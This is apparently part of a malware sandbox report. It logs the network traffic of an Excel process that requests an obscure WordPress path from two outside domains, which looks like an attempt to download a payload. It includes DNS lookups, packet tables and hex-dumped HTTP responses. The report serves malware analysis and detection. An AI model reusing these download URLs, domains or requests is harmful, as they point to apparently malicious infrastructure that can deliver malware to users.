Dec 2, 2021 14:31:37.424268961 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424274921 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424288988 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424293041 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424309015 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424309015 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424328089 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424330950 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424339056 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424346924 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424359083 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424365997 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424376965 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424382925 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424393892 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424401045 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424412012 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424418926 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424429893 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424448967 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.425591946 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.428011894 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.428041935 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.428057909 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.428075075 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.428148985 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429130077 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429153919 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429167032 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429179907 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429193020 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429205894 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429217100 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429225922 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429244041 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429255009 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429260969 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429280043 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429280996 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429296017 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429302931 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429315090 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429315090 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429330111 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429332972 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429347992 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429349899 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.429367065 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.429383039 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.430392981 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681216955 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681255102 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681267977 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681279898 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681294918 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681308031 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681324959 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681348085 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681365013 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681380987 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681397915 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681415081 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681431055 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681447029 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681458950 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681476116 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681492090 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681505919 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681509972 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681528091 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681544065 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681545973 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681549072 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681550980 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681554079 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681564093 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681566954 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681581020 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.681581020 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681596041 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.681612015 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.682817936 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682841063 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682853937 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682868004 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682885885 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682905912 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682921886 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682939053 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682955980 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682971954 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.682987928 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683005095 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683003902 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683022976 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683029890 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683032990 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683038950 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683043957 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683053970 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683063030 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683073044 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683079004 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683094025 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683095932 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683110952 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683115005 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683125019 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683134079 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683141947 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683151960 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683168888 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683168888 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683182955 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683188915 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683202028 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683207035 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683217049 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683226109 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683233976 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683244944 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683262110 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683262110 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683278084 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683279037 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683290958 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683298111 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683307886 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683316946 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683324099 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683335066 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683351994 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683353901 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683366060 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683376074 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683384895 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683394909 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683402061 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683412075 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683429003 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683433056 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683444977 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683446884 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683461905 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683463097 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683476925 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683481932 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683495998 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683500051 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683512926 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683517933 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.683531046 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.683547020 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.686769962 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.686799049 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.686813116 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.686825037 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.686959028 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688026905 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688051939 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688065052 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688082933 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688098907 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688116074 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688133001 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688134909 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688149929 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688153982 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688155890 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688158989 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688169956 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688173056 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688189030 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688189983 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688203096 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688209057 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688222885 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688227892 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688242912 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688245058 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688261986 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688263893 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688277960 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688282967 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688296080 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688302040 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688316107 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688318968 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688334942 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688337088 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688349962 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688354969 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688366890 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688373089 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.688385963 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.688402891 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.689105988 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.689127922 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.689201117 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.689343929 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.694241047 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.941853046 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.941890001 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.941903114 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.941957951 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.941975117 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.941992044 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.942033052 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.942049980 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.942065954 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.942079067 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.942082882 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.942101955 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.942111969 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.942116022 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.942120075 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.942126036 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.942140102 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.942156076 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:32:37.682945013 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:32:37.683094978 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:33:34.288342953 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:33:34.548614979 CET	80	49166	47.96.4.95	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 14:31:34.415781975 CET	52167	53	192.168.2.22	8.8.8.8
Dec 2, 2021 14:31:34.435739040 CET	53	52167	8.8.8.8	192.168.2.22
Dec 2, 2021 14:31:35.191217899 CET	50591	53	192.168.2.22	8.8.8.8
Dec 2, 2021 14:31:35.600486040 CET	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 2, 2021 14:31:34.415781975 CET	192.168.2.22	8.8.8.8	0xea45	Standard query (0)	sadabahar.com.np	A (IP address)	IN (0x0001)
Dec 2, 2021 14:31:35.191217899 CET	192.168.2.22	8.8.8.8	0x2f5b	Standard query (0)	www.duoyuhudong.cn	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 2, 2021 14:31:34.435739040 CET	8.8.8.8	192.168.2.22	0xea45	No error (0)	sadabahar.com.np		194.233.67.242	A (IP address)	IN (0x0001)
Dec 2, 2021 14:31:35.600486040 CET	8.8.8.8	192.168.2.22	0x2f5b	No error (0)	www.duoyuhudong.cn		47.96.4.95	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

sadabahar.com.np

www.duoyuhudong.cn

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	194.233.67.242	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 14:31:34.627537966 CET	0	OUT	GET /wp-includes/pUMqITCt83a/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: sadabahar.com.np Connection: Keep-Alive
Dec 2, 2021 14:31:35.181148052 CET	2	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 x-powered-by: PHP/7.4.25 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding,User-Agent date: Thu, 02 Dec 2021 13:31:35 GMT server: LiteSpeed Data Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87 8e 35 4f 30 58 8e b1 14 db 51 9e 5c a5 b0 65 cb e9 86 ac 89 78 50 0b ca e2 e0 c4 77 76 6f 2f ef 43 92 aa 9f 12 0c e5 Data Ascii: 108c[s6+`zj-IQeY5M^ovI<QH(d7VxbX,]'?KPxj9>^]/(\`!Z{e/ZSrr,rSSFj1/W8!jhe JXh!\|j-Jn7^EnmU'b\9_^{z#<,/DQ3Tizls.+y^\|]1qSA`AELQ<bDs#y;LI/<NNB<`5b'zHixBcGgOODe5@^9!Q/)yPaF]Z")stGY,;(EY,mX69fS@\7]M7z;oc{er,OcM\k\|%Bb+,JkM]R&7wRf xKw5wvr\|ttt2_1V:7k,s:^(VeB`:VKv)b^poY$gd\/xD&&H:;3[e;7I;WxROsV3VCm1CTSO1IN*,:Y;c>m0lDeo\tB5O0XQ\exPwvo/C
Dec 2, 2021 14:31:35.181179047 CET	3	IN	Data Raw: 5b 47 4c fd 89 b8 e6 5e 42 58 ac 16 13 f1 dd 77 f6 8e cb 6b fe 5a bc 7d 3b cd 87 0e 03 a7 f3 ce 49 fa e1 c3 c9 6e 66 6c a3 f4 93 de 44 de 51 15 2e 3a a9 07 a3 fc 01 4b 92 50 46 a6 96 e2 a9 05 33 c9 c1 83 5c fa 3e 1a f4 d3 7b f4 77 41 71 62 39 c4 Data Ascii: [GL^BXwkZ};InflDQ.:KPF3\>{wAqb9X3 ?yW#rU:urI/8`x/Nu*5W}PJGA^W?=$/L1hQZAbhgI6[b(kT4rZm
Dec 2, 2021 14:31:35.181190968 CET	4	IN	Data Raw: 98 12 0f 2d fd 0d da fa bb c8 fa bb d3 f9 89 00 8d 7d 7f 82 00 54 b8 4a 60 26 e7 5c 2c 03 b4 4a 53 22 20 e4 7a 8e 70 fd ca a0 fb 5f 47 88 01 98 3a e7 7a 6d 89 90 b8 e1 82 84 ef f9 4a a1 c5 a0 2a 9e df 32 27 5f 5e 47 17 15 21 c0 19 36 0c e3 cb 0b Data Ascii: -}TJ`&\,JS" zp_G:zmJ*2'_^G!61qUq5(&LYFF(<T<'!ro$t8g`huU nwBpGa2/KN!mLQPoz-q<-
Dec 2, 2021 14:31:35.181201935 CET	5	IN	Data Raw: 6a 6c 6e 52 15 92 b8 f3 64 45 a3 47 6f 6b 1d 06 7f 3e 86 e3 47 de ff d2 99 a4 91 4e 24 c1 41 84 0d 5e e7 e0 69 32 d7 01 1b b3 3d 30 d3 f3 c4 1d 8c fd 10 e3 b0 4b 15 ad 08 eb 02 56 5c 0d 61 99 33 a1 da 6d 0f 43 78 30 c2 d2 50 b6 95 c5 01 08 cb f4 Data Ascii: jlnRdEGok>GN$A^i2=0KV\a3mCx0PUCXmx%N;y6a}\|s~C<1\P$ss2`5'4rs_v,PN}Bp{`r0Gp>cG1nrQKS&\|}{k$s1
Dec 2, 2021 14:31:35.237093925 CET	7	IN	Data Raw: 38 38 32 0d 0a ec 5d 5f 6f e3 36 12 7f 76 3e c5 94 45 f7 e5 40 5b 7f ec 8d 7d b5 55 5c ef 8a bb 05 da eb a2 db e2 1e 0d c6 62 6c 6d 24 4b 11 e5 38 db 43 bf fb 61 66 48 9a 76 1c c7 db 24 77 c0 a1 c0 6e 4c 53 14 39 9a 19 71 66 48 ce cf 27 d2 da 28 Data Ascii: 882]_o6v>E@[}U\blm$K8CafHv$wnLS9qfH'(*lsr,/F<?\|SjoyeSO`p{u{#ID0?(ze`fRW9s!rrGTS0NIm#?zM(;
